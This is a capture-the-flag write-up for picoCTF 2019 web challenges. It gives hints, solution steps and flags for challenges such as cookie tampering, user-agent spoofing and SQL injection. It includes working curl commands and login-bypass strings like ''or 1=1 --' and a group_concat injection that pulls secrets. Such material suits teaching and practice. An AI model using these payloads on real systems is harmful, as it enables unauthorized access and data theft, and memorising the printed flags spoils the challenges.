< picoCTF2019 | Web Exploitation Writeup



Web Exploitation Writeup


Table of Contents

  1. Insp3ct0r - Points: 50
  2. dont-use-client-side - Points: 100
  3. logon - Points: 100
  4. where are the robots - Points: 100
  5. Client-side-again - Points: 200
  6. Open-to-admins - Points: 200
  7. picobrowser - Points: 200
  8. Irish-Name-Repo 1 - Points: 300
  9. Irish-Name-Repo 2 - Points: 350
  10. Irish-Name-Repo 3 - Points: 400
  11. Empire1 - Points: 400
  12. Empire2 - Points: 450
Insp3ct0r - Points: 50
Kishor Balan tipped us off that the following code may need inspection: https://2019shell1.picoctf.com/problem/63975/ (link) or http://2019shell1.picoctf.com:63975

Hint: How do you inspect web code on a browser? There's 3 parts 


Analyze html, css and js

picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?d3db9182}

dont-use-client-side - Points: 100
Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/45147/ (link) or http://2019shell1.picoctf.com:45147

Hint: Never trust the client 


Find the flag viewing source

picoCTF{no_clients_plz_4a60f3}

logon - Points: 100
The factory is hiding things from all of its users. Can you login as logon and find what they've been looking at? https://2019shell1.picoctf.com/problem/32270/ (link) or http://2019shell1.picoctf.com:32270

Hint: Hmm it doesn't seem to check anyone's password, except for {{name}}'s? 


- Log in as admin
- Inspect element and check for Storage (we are looking for cookies)
- Change the value of admin line to True instead of False

picoCTF{l3arn_th3_r0p35}

where are the robots - Points: 100
Can you find the robots? https://2019shell1.picoctf.com/problem/32229/ (link) or http://2019shell1.picoctf.com:32229

Hint: What part of the website could tell you where the creator doesn't want you to look? 


$ wget --spider -r --no-parent http://2019shell1.picoctf.com:32229

picoCTF{ca1cu1at1ng_Mach1n3s_0ecd0}

Client-side-again - Points: 200
Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/47277/ (link) or http://2019shell1.picoctf.com:47277

Hint: What is obfuscation? 


Analyze the javascript and reoder it

picoCTF{not_this_again_d29871}

Open-to-admins - Points: 200
This secure website allows users to access the flag only if they are admin and if the time is exactly 1400. https://2019shell1.picoctf.com/problem/12276/ (link) or http://2019shell1.picoctf.com:12276

Hint: Can cookies help you to get the flag? 


$ curl "https://2019shell1.picoctf.com/problem/12276/flag" -H "Cookie: time=1400; admin=True;" -s | grep -oE "picoCTF{.*}"

picoCTF{0p3n_t0_adm1n5_dcb566bb}

picobrowser - Points: 200
This website can be rendered only by picobrowser, go and catch the flag! https://2019shell1.picoctf.com/problem/12255/ (link) or http://2019shell1.picoctf.com:12255

Hint: You dont need to download a new web browser 


$ curl "https://2019shell1.picoctf.com/problem/12255/flag" -H "User-Agent:picobrowser" -s | grep -oE "picoCTF{.*}"

picoCTF{p1c0_s3cr3t_ag3nt_bbe8a517}

Irish-Name-Repo 1 - Points: 300
There is a website running at https://2019shell1.picoctf.com/problem/32241/ (link) or http://2019shell1.picoctf.com:32241. Do you think you can log us in? Try to see if you can login!

Hint: There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?

Hint: Try to think about how does the website verify your login?

It's a SQL injection type challenge. In the login form page, look for the debug line (CTRL + U to view source code) and change the value to 1 and try to submit a randomly login request 

<input type="hidden" name="debug" value="1">
Output should looks like as following 

username: admin
password: admin
SQL query: SELECT * FROM users WHERE name='admin' AND password='admin'

Login failed.
To bypass the authentication login SQLi string is needed 

# 'or 1=1 --
curl "https://2019shell1.picoctf.com/problem/32241/login.php" --data "username='+or+1=1+--&password=1234" && echo

picoCTF{s0m3_SQL_0397f20c}

Irish-Name-Repo 2 - Points: 350
There is a website running at https://2019shell1.picoctf.com/problem/14912/ (link). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://2019shell1.picoctf.com:14912

Hint: The password is being filtered.

As the previous one, it's a SQL injection type challenge. The only difference this time it's that a check to our input is performed. The following do the job to solve this challenge 

curl "https://2019shell1.picoctf.com/problem/14912/login.php" --data "username='+--&password=admin" && echo

picoCTF{m0R3_SQL_plz_752d1173}

Irish-Name-Repo 3 - Points: 400
There is a secure website running at https://2019shell1.picoctf.com/problem/47247/ (link) or http://2019shell1.picoctf.com:47247. Try to see if you can login as admin!

Hint: Seems like the password is encrypted.

As the previous one, it's a SQL injection type challenge. However this time the password seems to be encrypted in some way. After setting the value of debug to 1 as before and performed an authentication request, the output is: 

password: 'or 1=1--
SQL query: SELECT * FROM admin where password = ''be 1=1--'
To solve this challenge the same encryption is needed 

# 'be 1=1 --
curl "https://2019shell1.picoctf.com/problem/47247/login.php" --data "password='+be+1=1+--" && echo

picoCTF{3v3n_m0r3_SQL_c2c37f5e}

Empire1 - Points: 400
Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/49726/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:49726

Hint: Pay attention to the feedback you get

Hint: There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.

Hint: The database gets reverted every 2 hours if you do break it, just come back later

SQLi on the register/login page is the first thing that has been tried: these pages doesn’t seem to be vulnerable to SQLi. So an user has been created. After the login, the first thing has been noticed is the todo page, a simple injection has been tried. It didn't work, again, but an error has been displayed after. It's the right way. After some others attempt and some research, the string which helped to solve the challenge is: 

'||( select group_concat(secret) from user) ||'

picoCTF{wh00t_it_a_sql_injectdf389592}